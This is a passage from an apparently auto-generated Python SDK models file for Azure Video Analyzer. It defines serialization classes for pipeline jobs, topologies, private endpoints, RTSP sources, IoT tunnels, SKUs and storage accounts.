{'key': 'provider', 'type': 'str'}, 'resource': {'key': 'resource', 'type': 'str'}, 'operation': {'key': 'operation', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, } def __init__( self, **kwargs ): super(OperationDisplay, self).__init__(**kwargs) self.provider = kwargs.get('provider', None) self.resource = kwargs.get('resource', None) self.operation = kwargs.get('operation', None) self.description = kwargs.get('description', None) class ParameterDeclaration(msrest.serialization.Model): """Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines. All required parameters must be populated in order to send to Azure. :param name: Required. Name of the parameter. :type name: str :param type: Required. Type of the parameter. Possible values include: "String", "SecretString", "Int", "Double", "Bool". :type type: str or ~video_analyzer.models.ParameterType :param description: Description of the parameter. :type description: str :param default: The default value for the parameter to be used if the pipeline does not specify a value. :type default: str """ _validation = { 'name': {'required': True}, 'type': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'default': {'key': 'default', 'type': 'str'}, } def __init__( self, **kwargs ): super(ParameterDeclaration, self).__init__(**kwargs) self.name = kwargs['name'] self.type = kwargs['type'] self.description = kwargs.get('description', None) self.default = kwargs.get('default', None) class ParameterDefinition(msrest.serialization.Model): """Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information. All required parameters must be populated in order to send to Azure. :param name: Required. Name of the parameter declared in the pipeline topology. :type name: str :param value: Parameter value to be applied on this specific pipeline. :type value: str """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'value': {'key': 'value', 'type': 'str'}, } def __init__( self, **kwargs ): super(ParameterDefinition, self).__init__(**kwargs) self.name = kwargs['name'] self.value = kwargs.get('value', None) class PemCertificateList(CertificateSource): """A list of PEM formatted certificates. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param certificates: Required. PEM formatted public certificates. One certificate per entry. :type certificates: list[str] """ _validation = { 'type': {'required': True}, 'certificates': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'certificates': {'key': 'certificates', 'type': '[str]'}, } def __init__( self, **kwargs ): super(PemCertificateList, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str self.certificates = kwargs['certificates'] class PipelineJob(ProxyResource): """Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: Reference to an existing pipeline topology. When activated, this pipeline job will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :ivar state: Current state of the pipeline (read-only). Possible values include: "Processing", "Canceled", "Completed", "Failed". :vartype state: str or ~video_analyzer.models.PipelineJobState :ivar expiration: The date-time by when this pipeline job will be automatically deleted from your account. :vartype expiration: ~datetime.datetime :ivar error: Details about the error, in case the pipeline job fails. :vartype error: ~video_analyzer.models.PipelineJobError :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameters values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can be optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, 'expiration': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'}, 'error': {'key': 'properties.error', 'type': 'PipelineJobError'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(PipelineJob, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.state = None self.expiration = None self.error = None self.parameters = kwargs.get('parameters', None) class PipelineJobCollection(msrest.serialization.Model): """A collection of PipelineJob items. :param value: A collection of PipelineJob items. :type value: list[~video_analyzer.models.PipelineJob] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[PipelineJob]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(PipelineJobCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class PipelineJobError(msrest.serialization.Model): """Details about the error for a failed pipeline job. :param code: The error code. :type code: str :param message: The error message. :type message: str """ _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, } def __init__( self, **kwargs ): super(PipelineJobError, self).__init__(**kwargs) self.code = kwargs.get('code', None) self.message = kwargs.get('message', None) class PipelineJobOperationStatus(msrest.serialization.Model): """Used for tracking the status of an operation on the pipeline job. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The name of the pipeline job operation. :vartype name: str :ivar status: The status of the pipeline job operation. :vartype status: str :ivar error: The error details for the pipeline job operation. :vartype error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'readonly': True}, 'status': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(PipelineJobOperationStatus, self).__init__(**kwargs) self.name = None self.status = None self.error = None class PipelineJobUpdate(ProxyResource): """Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: Reference to an existing pipeline topology. When activated, this pipeline job will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :ivar state: Current state of the pipeline (read-only). Possible values include: "Processing", "Canceled", "Completed", "Failed". :vartype state: str or ~video_analyzer.models.PipelineJobState :ivar expiration: The date-time by when this pipeline job will be automatically deleted from your account. :vartype expiration: ~datetime.datetime :ivar error: Details about the error, in case the pipeline job fails. :vartype error: ~video_analyzer.models.PipelineJobError :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameters values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can be optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, 'expiration': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'}, 'error': {'key': 'properties.error', 'type': 'PipelineJobError'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(PipelineJobUpdate, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.state = None self.expiration = None self.error = None self.parameters = kwargs.get('parameters', None) class PipelineTopology(ProxyResource): """Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following: * Parameters: list of user defined parameters that can be references across the topology nodes. * Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras. * Processors: list of nodes which perform data analysis or transformations. * Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param kind: Required. Topology kind. Possible values include: "Live", "Batch". :type kind: str or ~video_analyzer.models.Kind :param sku: Required. Describes the properties of a SKU. :type sku: ~video_analyzer.models.Sku :param description: An optional description of the pipeline topology. It is recommended that the expected use of the topology to be described here. :type description: str :param parameters: List of the topology parameter declarations. Parameters declared here can be referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern. Parameters can have optional default values and can later be defined in individual instances of the pipeline. :type parameters: list[~video_analyzer.models.ParameterDeclaration] :param sources: List of the topology source nodes. Source nodes enable external data to be ingested by the pipeline. :type sources: list[~video_analyzer.models.SourceNodeBase] :param processors: List of the topology processor nodes. Processor nodes enable pipeline data to be analyzed, processed or transformed. :type processors: list[~video_analyzer.models.ProcessorNodeBase] :param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or exported. :type sinks: list[~video_analyzer.models.SinkNodeBase] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'kind': {'required': True}, 'sku': {'required': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'kind': {'key': 'kind', 'type': 'str'}, 'sku': {'key': 'sku', 'type': 'Sku'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'}, 'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'}, 'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'}, 'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'}, } def __init__( self, **kwargs ): super(PipelineTopology, self).__init__(**kwargs) self.kind = kwargs['kind'] self.sku = kwargs['sku'] self.description = kwargs.get('description', None) self.parameters = kwargs.get('parameters', None) self.sources = kwargs.get('sources', None) self.processors = kwargs.get('processors', None) self.sinks = kwargs.get('sinks', None) class PipelineTopologyCollection(msrest.serialization.Model): """A collection of PipelineTopology items. :param value: A collection of PipelineTopology items. :type value: list[~video_analyzer.models.PipelineTopology] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[PipelineTopology]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(PipelineTopologyCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class PipelineTopologyUpdate(ProxyResource): """Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following: * Parameters: list of user defined parameters that can be references across the topology nodes. * Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras. * Processors: list of nodes which perform data analysis or transformations. * Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param kind: Topology kind. Possible values include: "Live", "Batch". :type kind: str or ~video_analyzer.models.Kind :param sku: Describes the properties of a SKU. :type sku: ~video_analyzer.models.Sku :param description: An optional description of the pipeline topology. It is recommended that the expected use of the topology to be described here. :type description: str :param parameters: List of the topology parameter declarations. Parameters declared here can be referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern. Parameters can have optional default values and can later be defined in individual instances of the pipeline. :type parameters: list[~video_analyzer.models.ParameterDeclaration] :param sources: List of the topology source nodes. Source nodes enable external data to be ingested by the pipeline. :type sources: list[~video_analyzer.models.SourceNodeBase] :param processors: List of the topology processor nodes. Processor nodes enable pipeline data to be analyzed, processed or transformed. :type processors: list[~video_analyzer.models.ProcessorNodeBase] :param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or exported. :type sinks: list[~video_analyzer.models.SinkNodeBase] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'kind': {'key': 'kind', 'type': 'str'}, 'sku': {'key': 'sku', 'type': 'Sku'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'}, 'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'}, 'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'}, 'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'}, } def __init__( self, **kwargs ): super(PipelineTopologyUpdate, self).__init__(**kwargs) self.kind = kwargs.get('kind', None) self.sku = kwargs.get('sku', None) self.description = kwargs.get('description', None) self.parameters = kwargs.get('parameters', None) self.sources = kwargs.get('sources', None) self.processors = kwargs.get('processors', None) self.sinks = kwargs.get('sinks', None) class PrivateEndpoint(msrest.serialization.Model): """The Private Endpoint resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: The ARM identifier for Private Endpoint. :vartype id: str """ _validation = { 'id': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, } def __init__( self, **kwargs ): super(PrivateEndpoint, self).__init__(**kwargs) self.id = None class PrivateEndpointConnection(Resource): """The Private Endpoint Connection resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param private_endpoint: The resource of private end point. :type private_endpoint: ~video_analyzer.models.PrivateEndpoint :param private_link_service_connection_state: A collection of information about the state of the connection between service consumer and provider. :type private_link_service_connection_state: ~video_analyzer.models.PrivateLinkServiceConnectionState :ivar provisioning_state: The provisioning state of the private endpoint connection resource. Possible values include: "Succeeded", "Creating", "Deleting", "Failed". :vartype provisioning_state: str or ~video_analyzer.models.PrivateEndpointConnectionProvisioningState """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'provisioning_state': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'}, 'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, } def __init__( self, **kwargs ): super(PrivateEndpointConnection, self).__init__(**kwargs) self.private_endpoint = kwargs.get('private_endpoint', None) self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None) self.provisioning_state = None class PrivateEndpointConnectionListResult(msrest.serialization.Model): """List of private endpoint connection associated with the specified storage account. :param value: Array of private endpoint connections. :type value: list[~video_analyzer.models.PrivateEndpointConnection] """ _attribute_map = { 'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'}, } def __init__( self, **kwargs ): super(PrivateEndpointConnectionListResult, self).__init__(**kwargs) self.value = kwargs.get('value', None) class PrivateLinkResource(Resource): """A private link resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :ivar group_id: The private link resource group id. :vartype group_id: str :ivar required_members: The private link resource required member names. :vartype required_members: list[str] :param required_zone_names: The private link resource Private link DNS zone name. :type required_zone_names: list[str] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'group_id': {'readonly': True}, 'required_members': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'group_id': {'key': 'properties.groupId', 'type': 'str'}, 'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'}, 'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'}, } def __init__( self, **kwargs ): super(PrivateLinkResource, self).__init__(**kwargs) self.group_id = None self.required_members = None self.required_zone_names = kwargs.get('required_zone_names', None) class PrivateLinkResourceListResult(msrest.serialization.Model): """A list of private link resources. :param value: Array of private link resources. :type value: list[~video_analyzer.models.PrivateLinkResource] """ _attribute_map = { 'value': {'key': 'value', 'type': '[PrivateLinkResource]'}, } def __init__( self, **kwargs ): super(PrivateLinkResourceListResult, self).__init__(**kwargs) self.value = kwargs.get('value', None) class PrivateLinkServiceConnectionState(msrest.serialization.Model): """A collection of information about the state of the connection between service consumer and provider. :param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service. Possible values include: "Pending", "Approved", "Rejected". :type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus :param description: The reason for approval/rejection of the connection. :type description: str :param actions_required: A message indicating if changes on the service provider require any updates on the consumer. :type actions_required: str """ _attribute_map = { 'status': {'key': 'status', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'actions_required': {'key': 'actionsRequired', 'type': 'str'}, } def __init__( self, **kwargs ): super(PrivateLinkServiceConnectionState, self).__init__(**kwargs) self.status = kwargs.get('status', None) self.description = kwargs.get('description', None) self.actions_required = kwargs.get('actions_required', None) class Properties(msrest.serialization.Model): """Metric properties. Variables are only populated by the server, and will be ignored when sending a request. :ivar service_specification: The service specifications. :vartype service_specification: ~video_analyzer.models.ServiceSpecification """ _validation = { 'service_specification': {'readonly': True}, } _attribute_map = { 'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'}, } def __init__( self, **kwargs ): super(Properties, self).__init__(**kwargs) self.service_specification = None class ResourceIdentity(msrest.serialization.Model): """The user assigned managed identity to use when accessing a resource. All required parameters must be populated in order to send to Azure. :param user_assigned_identity: Required. The user assigned managed identity's resource identifier to use when accessing a resource. :type user_assigned_identity: str """ _validation = { 'user_assigned_identity': {'required': True}, } _attribute_map = { 'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'}, } def __init__( self, **kwargs ): super(ResourceIdentity, self).__init__(**kwargs) self.user_assigned_identity = kwargs['user_assigned_identity'] class RsaTokenKey(TokenKey): """Required validation properties for tokens generated with RSA algorithm. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param kid: Required. JWT token key id. Validation keys are looked up based on the key id present on the JWT token header. :type kid: str :param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include: "RS256", "RS384", "RS512". :type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo :param n: Required. RSA public key modulus. :type n: str :param e: Required. RSA public key exponent. :type e: str """ _validation = { 'type': {'required': True}, 'kid': {'required': True}, 'alg': {'required': True}, 'n': {'required': True}, 'e': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'kid': {'key': 'kid', 'type': 'str'}, 'alg': {'key': 'alg', 'type': 'str'}, 'n': {'key': 'n', 'type': 'str'}, 'e': {'key': 'e', 'type': 'str'}, } def __init__( self, **kwargs ): super(RsaTokenKey, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str self.alg = kwargs['alg'] self.n = kwargs['n'] self.e = kwargs['e'] class SourceNodeBase(NodeBase): """Base class for topology source nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: RtspSource, VideoSource. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str """ _validation = { 'type': {'required': True}, 'name': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'} } def __init__( self, **kwargs ): super(SourceNodeBase, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str class RtspSource(SourceNodeBase): """RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the RTSP messages are exchanged through long lived HTTP connections, and the RTP packages are interleaved in the HTTP connections alongside the RTSP messages. Possible values include: "Http", "Tcp". :type transport: str or ~video_analyzer.models.RtspTransport :param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This contains the required information for Video Analyzer to connect to RTSP cameras and/or generic RTSP servers. :type endpoint: ~video_analyzer.models.EndpointBase """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'endpoint': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'transport': {'key': 'transport', 'type': 'str'}, 'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'}, } def __init__( self, **kwargs ): super(RtspSource, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str self.transport = kwargs.get('transport', None) self.endpoint = kwargs['endpoint'] class TunnelBase(msrest.serialization.Model): """Base class for tunnel objects. You probably want to use the sub-classes and not this class directly. Known sub-classes are: SecureIotDeviceRemoteTunnel. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'} } def __init__( self, **kwargs ): super(TunnelBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class SecureIotDeviceRemoteTunnel(TunnelBase): """A remote tunnel securely established using IoT Hub device information. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param iot_hub_name: Required. Name of the IoT Hub. :type iot_hub_name: str :param device_id: Required. The IoT device id to use when establishing the remote tunnel. This string is case-sensitive. :type device_id: str """ _validation = { 'type': {'required': True}, 'iot_hub_name': {'required': True}, 'device_id': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'iot_hub_name': {'key': 'iotHubName', 'type': 'str'}, 'device_id': {'key': 'deviceId', 'type': 'str'}, } def __init__( self, **kwargs ): super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str self.iot_hub_name = kwargs['iot_hub_name'] self.device_id = kwargs['device_id'] class ServiceSpecification(msrest.serialization.Model): """The service metric specifications. Variables are only populated by the server, and will be ignored when sending a request. :ivar log_specifications: List of log specifications. :vartype log_specifications: list[~video_analyzer.models.LogSpecification] :ivar metric_specifications: List of metric specifications. :vartype metric_specifications: list[~video_analyzer.models.MetricSpecification] """ _validation = { 'log_specifications': {'readonly': True}, 'metric_specifications': {'readonly': True}, } _attribute_map = { 'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'}, 'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'}, } def __init__( self, **kwargs ): super(ServiceSpecification, self).__init__(**kwargs) self.log_specifications = None self.metric_specifications = None class SinkNodeBase(NodeBase): """Base class for topology sink nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: VideoSink. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'} } def __init__( self, **kwargs ): super(SinkNodeBase, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str self.inputs = kwargs['inputs'] class Sku(msrest.serialization.Model): """The SKU details. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1". :type name: str or ~video_analyzer.models.SkuName :ivar tier: The SKU tier. Possible values include: "Standard". :vartype tier: str or ~video_analyzer.models.SkuTier """ _validation = { 'name': {'required': True}, 'tier': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'tier': {'key': 'tier', 'type': 'str'}, } def __init__( self, **kwargs ): super(Sku, self).__init__(**kwargs) self.name = kwargs['name'] self.tier = None class StorageAccount(msrest.serialization.Model): """The details about the associated storage account. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param id: Required. The ID of the storage account resource. Video Analyzer relies on tables, queues, and blobs. The primary storage account must be a Standard Storage account (either Microsoft.ClassicStorage or Microsoft.Storage). :type id: str :param identity: A managed identity that Video Analyzer will use to access the storage account. :type identity: ~video_analyzer.models.ResourceIdentity :ivar status: The current status of the storage account mapping. :vartype status: str """ _validation = { 'id': {'required': True}, 'status': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'identity': {'key': 'identity', 'type': 'ResourceIdentity'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(StorageAccount, self).__init__(**kwargs) self.id = kwargs['id'] self.identity = kwargs.get('identity', None) self.status = None class SystemData(msrest.serialization.Model): """Metadata pertaining to creation and last modification of the resource. :param created_by: The identity that created the resource. :type created_by: str :param created_by_type: The type of identity that created the resource. Possible values include: "User", "Application", "ManagedIdentity", "Key". :type created_by_type: str or ~video_analyzer.models.CreatedByType :param created_at: The timestamp of resource creation (UTC). :type created_at: ~datetime.datetime :param last_modified_by: The identity that last modified the resource. :type last_modified_by: str :param last_modified_by_type: The type of identity that last modified the resource. Possible values include: "User", "Application", "ManagedIdentity", "Key". :type last_modified_by_type: str or ~video_analyzer.models.CreatedByType :param 